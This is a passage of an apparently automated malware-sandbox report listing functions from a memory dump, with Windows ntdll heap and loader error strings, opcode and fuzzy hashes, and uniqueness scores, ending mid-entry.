                                                                    0x01611db0
                                                                    0x01611db1
                                                                    0x01611db7
                                                                    0x01611dc2
                                                                    0x01611de1
                                                                    0x01611de2
                                                                    0x01611dc4
                                                                    0x01611dd9
                                                                    0x01611dde
                                                                    0x01611df3
                                                                    0x01611df9
                                                                    0x01611dfa
                                                                    0x01611e00
                                                                    0x01611e0a
                                                                    0x01611e13
                                                                    0x01611e32
                                                                    0x01611e33
                                                                    0x01611e15
                                                                    0x01611e2a
                                                                    0x01611e2f
                                                                    0x01611e39
                                                                    0x01611e4a
                                                                    0x01611e02
                                                                    0x01611e02
                                                                    0x01611e08
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01611e08
                                                                    0x01611e5b
                                                                    0x01611e7a
                                                                    0x01611e7b
                                                                    0x01611e5d
                                                                    0x01611e72
                                                                    0x01611e77
                                                                    0x01611e95

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: 7fec374c154c5db9b7faefaba5572d979c5e9939d8358794342703def58a1c43
                                                                    • Instruction ID: 99de4b2d25ed10cf569b87824b56a0a118cad5cd668334e619433c38cac95912
                                                                    • Opcode Fuzzy Hash: 7fec374c154c5db9b7faefaba5572d979c5e9939d8358794342703def58a1c43
                                                                    • Instruction Fuzzy Hash: EE610037950146DFD791ABB9DC9AD2473E1FB41920F0E802EFA0A5F344DA388D428F5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01563D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 01563DC0
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 01563D8C
                                                                    • WindowsExcludedProcs, xrefs: 01563D6F
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01563E97
                                                                    • Kernel-MUI-Language-SKU, xrefs: 01563F70
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: a0b178b9e146e64be968e938a2f0d9942d327487c8327abed912889514455f12
                                                                    • Instruction ID: be03fa229676afac0e8fbc8d7ebb32f5c7ddc659be7a5051b4cc5d123626108d
                                                                    • Opcode Fuzzy Hash: a0b178b9e146e64be968e938a2f0d9942d327487c8327abed912889514455f12
                                                                    • Instruction Fuzzy Hash: 59F11B72D0061AEFDF11DF98D980AEEBBBDFF58650F15046AE505AB250E7349E01CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01588E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015C932A
                                                                    • LdrpFindDllActivationContext, xrefs: 015C9331, 015C935D
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 015C9357
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015C933B, 015C9367
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 21b0abeda0941aeff4352463c5c395de11b8345f4595731eb7675d789436e3d4
                                                                    • Instruction ID: cd242dfc0b8dbf8f55ef0291bb959337c1b7498087568bff2b3b87b751289ed6
                                                                    • Opcode Fuzzy Hash: 21b0abeda0941aeff4352463c5c395de11b8345f4595731eb7675d789436e3d4
                                                                    • Instruction Fuzzy Hash: 3B41E422A007199FEB36BA5C8C49B3DB7A5FB44744F854569E9047F1D1E760AD808391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01568794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 015B9C18
                                                                    • LdrpDoPostSnapWork, xrefs: 015B9C1E
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015B9C28
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: 708794a274b77b7c3bd3fe8bc3733db4d3813bcd78371034b2a8a2801049d933
                                                                    • Instruction ID: 98edc5b2b5f0697d0876dfbb3a464cfbf67b368cca4deb9dad27d1426b7d5047
                                                                    • Opcode Fuzzy Hash: 708794a274b77b7c3bd3fe8bc3733db4d3813bcd78371034b2a8a2801049d933
                                                                    • Instruction Fuzzy Hash: 7191D171A003169FEF28DF59D881ABEB7B9FF84314B184569DA05AF241EB30E911CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01567E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 015B98A2
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 015B9891
                                                                    • LdrpCompleteMapModule, xrefs: 015B9898
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 6d2dc8ea491239f2e4ef896ecd1cbf6cb66b88759a883da4e12930aef0ab98a3
                                                                    • Instruction ID: 5a724c6a369a16b9700c5f3db320486cfee0a2bd932691022a659bb5c60ef26d
                                                                    • Opcode Fuzzy Hash: 6d2dc8ea491239f2e4ef896ecd1cbf6cb66b88759a883da4e12930aef0ab98a3
                                                                    • Instruction Fuzzy Hash: 6051DF716007469FE722CB6CCD84B6ABBE8BB48718F040559EA519F3D1D734ED04CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0155E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0155E68C
                                                                    • @, xrefs: 0155E6C0
                                                                    • InstallLanguageFallback, xrefs: 0155E6DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: ae0b83a56710b7b0fe6bcabbd3ba6fb2b036021a970993a464aba19ee8db5041
                                                                    • Instruction ID: 931f9ea04e8aa83060b0e4af65ec2e3e52b67b8b633da1de7e7d17ceac5a6f6a
                                                                    • Opcode Fuzzy Hash: ae0b83a56710b7b0fe6bcabbd3ba6fb2b036021a970993a464aba19ee8db5041
                                                                    • Instruction Fuzzy Hash: 835180726143469BD718DF68C490AAFB7E9FF88615F05092EF985DB240F734DA04C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0161E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction ID: dd537ad90a1dfd2938b0062c7fe287c8cbce9b1993b447ea9b63b260fcbbfb22
                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction Fuzzy Hash: F49181316043429FE725CE69CD41B2BBBE6BF84714F18892DFA95CB284E775E804CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015D51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 2c48fa2a65ff8c66a160f10162ca698a09ed485c0b9d6f839f96e9782af6fcd3
                                                                    • Instruction ID: c11dba09c8f1876ce06260783be3b807ab849e39e051133ed127404a20c52f87
                                                                    • Opcode Fuzzy Hash: 2c48fa2a65ff8c66a160f10162ca698a09ed485c0b9d6f839f96e9782af6fcd3
                                                                    • Instruction Fuzzy Hash: 34516C71A106099FDB25DFACC880AAEBBF8FF98700F14442DE649EF251EA71D904CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0157B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0157B9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: 798c6511baef30c85adfee6aad12a33545130af4099b47c0f4b2725fc5c76734
                                                                    • Instruction ID: 630df433ac689382e0dc74c08a0bfc0e1e54230c9a7c1ce432da184744ec4ddf
                                                                    • Opcode Fuzzy Hash: 798c6511baef30c85adfee6aad12a33545130af4099b47c0f4b2725fc5c76734
                                                                    • Instruction Fuzzy Hash: 84515871A08301CFC721EF69D48192BBBF9FB88600F14896EF9998B355D771E844CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0155B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: 1a10a1cbf7751d365f8e4caa74f9afc18e5c0ef90ce373fbced315123eefcf45
                                                                    • Instruction ID: 4d87ef5138041c1e06c003c5ec4a9d6ae6c16fa96a4f87ce476e96477dad15a3
                                                                    • Opcode Fuzzy Hash: 1a10a1cbf7751d365f8e4caa74f9afc18e5c0ef90ce373fbced315123eefcf45
                                                                    • Instruction Fuzzy Hash: 8E51BF71D0026A8EEF35CF688895BFEBBB1BF44710F1041A9E85AAF282D7754941CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01582581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: 9fc4ed6842757302c989115f230d88fa724a35e457595989ea9f06bc07429092
                                                                    • Instruction ID: a80b66d53ba450411701cdb7e5e692a47c2cbe196265cf265050807d4ea09b61
                                                                    • Opcode Fuzzy Hash: 9fc4ed6842757302c989115f230d88fa724a35e457595989ea9f06bc07429092
                                                                    • Instruction Fuzzy Hash: EFC18E75E1021ADFDB25EF99D881AAEBBB5FF48740F444429E901FF250E734A941CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0158FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 015CBE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    • Opcode ID: bbaf9bf7ece397d1ce58211e1ccb905882af671da2b467523ca1e3c5ac35f02a
                                                                    • Instruction ID: c645528e17ec5d32d764d5034cb93d9aadc58027d7bcdeb36cb1ebcaea17cb8e
                                                                    • Opcode Fuzzy Hash: bbaf9bf7ece397d1ce58211e1ccb905882af671da2b467523ca1e3c5ac35f02a
                                                                    • Instruction Fuzzy Hash: B1A1E271B046068FEB25EFA8C851B7EB7A4BB48B50F04456EDA46EF680DB30D941CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01552D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    • Opcode ID: a8b63c30cb793f0f850b9cc3e45300799da82e462c6696eaed9bd3f3f5b4f2a5
                                                                    • Instruction ID: 16965b9b1a22010cfe1be0af146eb8ba6071fb318f3e3b3d5eed4549e9b5f6f9
                                                                    • Opcode Fuzzy Hash: a8b63c30cb793f0f850b9cc3e45300799da82e462c6696eaed9bd3f3f5b4f2a5
                                                                    • Instruction Fuzzy Hash: 01612131A40646DFEB22DF6CC8A4BBE7BE4FB84314F58066BD9119F2C1C770A9018791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01620EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 90dc8296188e2d0fd3f3a57f16b6eea409207a35319bea930c79e79b100d3aae
                                                                    • Instruction ID: 7d2e54489a0a791bd49047652bafc380943548eb1abcd596744f1b202c607603
                                                                    • Opcode Fuzzy Hash: 90dc8296188e2d0fd3f3a57f16b6eea409207a35319bea930c79e79b100d3aae
                                                                    • Instruction Fuzzy Hash: 2F519C713087829FD325DF28DC84B1BBBE5EBC5604F04092CFA8697290DB74E806CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0158F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction ID: 4a324c852ad95cdfb6ede84866203cbea4296a00d845919d40c3802c1b99b447
                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction Fuzzy Hash: 21519E71504712AFC320DF59C841A6BBBF8FF98750F00892EFA959B690E7B4E904CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015D3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: 04665e9cea86598e17d98e9d5f1f9789e05da0a8b7083d1295701a616b44d096
                                                                    • Instruction ID: 493009f0f2dc365387088332538063f73a41edbd90512fa9311d7584f75f537b
                                                                    • Opcode Fuzzy Hash: 04665e9cea86598e17d98e9d5f1f9789e05da0a8b7083d1295701a616b44d096
                                                                    • Instruction Fuzzy Hash: 764143F1D0052E9BDF219A54CC80FAEB77CBB44714F0045A5AA09AF240DB709E88CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 016205AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction ID: f63df9dad005f6215f6f27a6174c808b2f122c55aa0a3302ece56c4d00701730
                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction Fuzzy Hash: 9631F1322047666BE720DE28CD85F9B7BE9EBC4754F144229FA58EB280D770E904CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015D3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: 64c1bdf49b8aaa292c0f633f5869b021da32bbd5ed1d49ecd3f0a920d61b8600
                                                                    • Instruction ID: 9f44978c81f7ffe4b208121c75aff5cf8786c181f80bd0a102af760402d83643
                                                                    • Opcode Fuzzy Hash: 64c1bdf49b8aaa292c0f633f5869b021da32bbd5ed1d49ecd3f0a920d61b8600
                                                                    • Instruction Fuzzy Hash: D131C3B6D0151AAFEB25DF5CC945E6FBBB4FB80B20F014169E915AF291D7309E00C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0158D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 0dc67938e7927ddfb1d4f93b2a8707db9a1506cf7fcab31b86cfb7623143188b
                                                                    • Instruction ID: f406ee5626e8a43035b9c81336a4874017bffe8822043a4a9001e7a3673f3e0a
                                                                    • Opcode Fuzzy Hash: 0dc67938e7927ddfb1d4f93b2a8707db9a1506cf7fcab31b86cfb7623143188b
                                                                    • Instruction Fuzzy Hash: E331C1B15083069FC711EF68D88196FBBF8FBD5654F00092EF994AB290DA34DD05CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01561B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction ID: 9a9dade2ed9a6672610cabc2fd5043b3e7f46906bd236a86c6a49cc7c6b9d457
                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction Fuzzy Hash: 2321F876501919ABEB229A59C8C0FBFBBADBFC4650F154426FA048F204D630DC009BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0157F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: 65a2e2b77fe37ce7dc3582ba54c3aaa0601b5f6acdbdec452843be9dfb128c67
                                                                    • Instruction ID: 11fc16d856edee3475162fb783f756bb03af1e099bc4b2e014b1263ec306cdec
                                                                    • Opcode Fuzzy Hash: 65a2e2b77fe37ce7dc3582ba54c3aaa0601b5f6acdbdec452843be9dfb128c67
                                                                    • Instruction Fuzzy Hash: BD11B2353086028BEB25CE1DB89373AF6D5BB85624F24492BE571CF391DB70D8418780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01608DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 01608E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 34d4474ab69fd9785a9698feed1aaf9d943ba6fc51b4c0178fa1c6f8379cebb6
                                                                    • Instruction ID: e4fc0577c5bc83909a85b81dec8ecf91b53bec582b129df005c88799fa53350c
                                                                    • Opcode Fuzzy Hash: 34d4474ab69fd9785a9698feed1aaf9d943ba6fc51b4c0178fa1c6f8379cebb6
                                                                    • Instruction Fuzzy Hash: C21175B5D90349DADB2ADFA8890579EBBB4BB54314F20421EE529AB382C3340A02CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015EFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 015EFF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    • Opcode ID: 5aa4c349686f68c3195ac67e673b746e7c2ee564b133d916d5b16dac96ee9a80
                                                                    • Instruction ID: d9f36ea17fba7ac3231e49508718d5bd0d0d1faab0421f5bdc0493c1a5c40c7d
                                                                    • Opcode Fuzzy Hash: 5aa4c349686f68c3195ac67e673b746e7c2ee564b133d916d5b16dac96ee9a80
                                                                    • Instruction Fuzzy Hash: FA11ED75950145EFDB2AEF94CC48F9CBBF2FB48704F548054E5186F6A1CB389950CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01625BA5, Relevance: .6, Instructions: 592COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a19715b380de6d4e08f5b74901b0d675e4b29735b0e59dd54f353dee132c50ae
                                                                    • Instruction ID: cabd73b2bd45a4a401d9e455bc0029a5e5035297086a6295e9a620c000e76474
                                                                    • Opcode Fuzzy Hash: a19715b380de6d4e08f5b74901b0d675e4b29735b0e59dd54f353dee132c50ae
                                                                    • Instruction Fuzzy Hash: F342287590066A8FDB24CF68CD80BA9BBB1FF49304F1481AAD949EB342E7749985CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01574120, Relevance: .4, Instructions: 444COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c400e03204b8f9c6141c639f8263f72fcdaa82832303ca2cb956f4acc0881591
                                                                    • Instruction ID: e52e4ee2eff39f65b64f606b2eacad18a824df35952fa7faa6f67316f18e6a4c
                                                                    • Opcode Fuzzy Hash: c400e03204b8f9c6141c639f8263f72fcdaa82832303ca2cb956f4acc0881591
                                                                    • Instruction Fuzzy Hash: F3F16C706082528FD724CF19D482ABAB7E2FF98714F19492EF986CF250E734D891CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015820A0, Relevance: .4, Instructions: 420COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6959aaab83deeabe4256a4d127abb924d47ee0ca3334cd3f72e488b96f1e710
                                                                    • Instruction ID: 4e0f5e023b37ff9026273f62257a69f030595366465425510e473590e6b7834e
                                                                    • Opcode Fuzzy Hash: e6959aaab83deeabe4256a4d127abb924d47ee0ca3334cd3f72e488b96f1e710
                                                                    • Instruction Fuzzy Hash: 9CF1E4356083029FD726DFACC84076E7BE5BB86714F14891DE999AF281E774E841CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0156D5E0, Relevance: .4, Instructions: 353COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d5ecc5966a850f823104e1cd172ff9e5a9027dad6f19e0c26d4ca67867f613c
                                                                    • Instruction ID: 814d6b77042a44213f1f0e4ca6dd573f8da6aa03d2d7b75b2f50754d5ce025af
                                                                    • Opcode Fuzzy Hash: 2d5ecc5966a850f823104e1cd172ff9e5a9027dad6f19e0c26d4ca67867f613c
                                                                    • Instruction Fuzzy Hash: 22E1C034B0125ACFEB25CF68CC84BADB7BABF85304F040599D9499F291D774AD81CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0156849B, Relevance: .3, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50b70be8dc91579271c046cf0b774ec1359c749b62690297a4d95d8d5e08ac8e
                                                                    • Instruction ID: 47a80dd6402ae169c47626ef73995aeee3910a43cd5191a28c10df01a89818ff
                                                                    • Opcode Fuzzy Hash: 50b70be8dc91579271c046cf0b774ec1359c749b62690297a4d95d8d5e08ac8e
